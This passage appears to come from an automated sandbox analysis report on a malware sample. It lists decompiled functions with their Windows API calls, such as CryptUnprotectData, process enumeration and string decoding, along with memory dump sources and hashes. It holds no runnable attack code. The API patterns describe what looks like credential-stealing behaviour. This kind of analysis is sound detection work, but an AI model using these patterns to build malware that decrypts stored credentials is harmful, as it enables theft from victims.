                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 4Zov$P[Mo$_-K\$cq_o$j!k{
                        • API String ID: 0-3130016585
                        • Opcode ID: 62f1905a5ec7ad5c46c77d2b300784e888646f11927c25ef5bec299d9d7a00e5
                        • Instruction ID: d1161a9c2a922e1bde799cc1d46623a035b9b8fce8b3753e531750cbf8af772f
                        • Opcode Fuzzy Hash: 62f1905a5ec7ad5c46c77d2b300784e888646f11927c25ef5bec299d9d7a00e5
                        • Instruction Fuzzy Hash: 68A209F360C2049FE304AE2DEC8577AFBE9EB94720F16463DEAC4C3744E63598158696
                        Function 0069C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0069C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0069C87C
                        • lstrcat.KERNEL32(?,006B0B46), ref: 0069C943
                        • lstrcat.KERNEL32(?,006B0B47), ref: 0069C957
                        • lstrcat.KERNEL32(?,006B0B4E), ref: 0069C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: b8b5831338f7c6c668dd8b9beab452384c984cde623aee5ed88f1270ceabb08c
                        • Instruction ID: cae9bfd4557a0a9be6fe2762204bc3899151e53975ef1c497ca8a5524e406097
                        • Opcode Fuzzy Hash: b8b5831338f7c6c668dd8b9beab452384c984cde623aee5ed88f1270ceabb08c
                        • Instruction Fuzzy Hash: 324192B5D0421ADFDB10DFA0DD89BFEB7B9BB48304F1042A9E509A7280D7709A84CF91
                        Function 006A6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 006A696C
                        • sscanf.NTDLL ref: 006A6999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006A69B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006A69C0
                        • ExitProcess.KERNEL32 ref: 006A69DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 84666b3225606d78b5d4df07f81fdecead05c56250d1d7d2ffa772dca24b76f5
                        • Instruction ID: cf5eabca63612cf05bbabdfc4d92d67be60dbca19001e8de0b4efa4cfbceae10
                        • Opcode Fuzzy Hash: 84666b3225606d78b5d4df07f81fdecead05c56250d1d7d2ffa772dca24b76f5
                        • Instruction Fuzzy Hash: 9021EB75D10209ABCF48EFE4D945AEEB7BABF48300F14852EE416E3250EB345604CB69
                        Function 00697240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0069724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00697254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00697281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006972A4
                        • LocalFree.KERNEL32(?), ref: 006972AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: b009488dfe245241148f2cad0dae15033c64fb3720faa229bf58a6cc494ad58c
                        • Instruction ID: ee03cf993f0893fe12efa29fa47c252e88b2cd44775738241044dc41d2fcbe9b
                        • Opcode Fuzzy Hash: b009488dfe245241148f2cad0dae15033c64fb3720faa229bf58a6cc494ad58c
                        • Instruction Fuzzy Hash: 1A014CB1A41208BBEB14DFD4CD4AF9E7BB8BB44B00F204155FB05AA2C0D6B0AA008B65
                        Function 006A9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006A961E
                        • Process32First.KERNEL32(006B0ACA,00000128), ref: 006A9632
                        • Process32Next.KERNEL32(006B0ACA,00000128), ref: 006A9647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 006A965C
                        • CloseHandle.KERNEL32(006B0ACA), ref: 006A967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: f6d4bfd35ad0421a34311597161d8df95b6a304e0aaef88abaaacd4e7e1944ce
                        • Instruction ID: cba2f04aa5a7267499c93763c473aff84a4c29dc20b44cc1cfa9abbc0be0f0c7
                        • Opcode Fuzzy Hash: f6d4bfd35ad0421a34311597161d8df95b6a304e0aaef88abaaacd4e7e1944ce
                        • Instruction Fuzzy Hash: A0010C75A01208ABDB14DFA5CD48BEDB7F9FF49700F204299A905A6240DB749F40DF61
                        Function 00A63C98 Relevance: 7.5, Strings: 5, Instructions: 1212COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !~}$CP~$CP~$[5}[$~w
                        • API String ID: 0-1243999158
                        • Opcode ID: 48cd9e7058a1a3b5e3264fae031b423d05b3e486476fde51c1403d9ce19b2bad
                        • Instruction ID: c0d330ee74f0bd2960ff44dd0e09a559d1b18406282e7bd254986b41d869c3a3
                        • Opcode Fuzzy Hash: 48cd9e7058a1a3b5e3264fae031b423d05b3e486476fde51c1403d9ce19b2bad
                        • Instruction Fuzzy Hash: 2282E6F3A082109FE304AE2DEC8567ABBE5EB94720F16853DEAC4D3744E63598058797
                        Function 00A62326 Relevance: 7.3, Strings: 5, Instructions: 1094COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: *W$5m$kGO^$tK,~$\o
                        • API String ID: 0-2829524358
                        • Opcode ID: 18d66bd8d15f026609caa022fe7d09303b5aebd313870a7bdbed936f53e3b335
                        • Instruction ID: d9f306fcf482dc4299533b6f3686312f2a3446c61de5d4f2e7fcb4ec1855394b
                        • Opcode Fuzzy Hash: 18d66bd8d15f026609caa022fe7d09303b5aebd313870a7bdbed936f53e3b335
                        • Instruction Fuzzy Hash: AA7229F3A0C6109FE3046E2DEC85A7ABBE9EF94720F1A453DEAC5C7744E53558018792
                        Function 006A8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,00695184,40000001,00000000,00000000,?,00695184), ref: 006A8EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 347c9b48104dbe56207917fd6b194cc6c4e2c5f77a34897c44d1068f3b4d7d21
                        • Instruction ID: 9a439d2c5484e90a78306417e0ff991dcd008350426b39ee2cc5c4f17519628f
                        • Opcode Fuzzy Hash: 347c9b48104dbe56207917fd6b194cc6c4e2c5f77a34897c44d1068f3b4d7d21
                        • Instruction Fuzzy Hash: 69110670200209EFDB04EF64E884FAB37AABF8A340F109558F9198B250DB35EC41DF60
                        Function 006A7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0126F238,00000000,?,006B0E10,00000000,?,00000000,00000000), ref: 006A7A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A7A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0126F238,00000000,?,006B0E10,00000000,?,00000000,00000000,?), ref: 006A7A7D
                        • wsprintfA.USER32 ref: 006A7AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: 04b651bda692fee1dd872fdfed394c7d46f349886dcdd88bc93a880669b357bd
                        • Instruction ID: bbf27f3a3e070804a67f96b8f8255eb22f867e9a13d4e51a6c7a3c3a75d0f28a
                        • Opcode Fuzzy Hash: 04b651bda692fee1dd872fdfed394c7d46f349886dcdd88bc93a880669b357bd
                        • Instruction Fuzzy Hash: 2F11A5B1946228EBEB14DF54DC45FAAB778F705711F1043A6EA06932C0C7745E40CF51
                        Function 006A3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.COMBASE(006AE118,00000000,00000001,006AE108,00000000), ref: 006A3758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006A37B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 6d4c15dcab31ae23d9124caf8e7c7da9daefe018e24b401cdbf768cdc89d2b48
                        • Instruction ID: ba29e8f362df5c301f79ac502ede86b35bb08e48bc5412a8c11b032079fc0d73
                        • Opcode Fuzzy Hash: 6d4c15dcab31ae23d9124caf8e7c7da9daefe018e24b401cdbf768cdc89d2b48
                        • Instruction Fuzzy Hash: 9641F670A00A289FDB24DF58CC95B9BB7B5BB49702F4041D8F609A72D0E7B1AE85CF50
                        Function 00699B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00699B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00699BA3
                        • LocalFree.KERNEL32(?), ref: 00699BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: cf75dbba2050ac36c6e1c58f7fe772d1c6af206f65894ac1c981a254c29399bf
                        • Instruction ID: 3a73d9ed88448380f6f3171554266cbcf2e09e6a586cde93ad63215510eb7a4f
                        • Opcode Fuzzy Hash: cf75dbba2050ac36c6e1c58f7fe772d1c6af206f65894ac1c981a254c29399bf
                        • Instruction Fuzzy Hash: A411FAB4A01209EFCB04DF98D985AAE77B9FF88300F104569E915A7350D774AE10CF61
                        Function 00A5BD04 Relevance: 3.4, Strings: 2, Instructions: 917COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
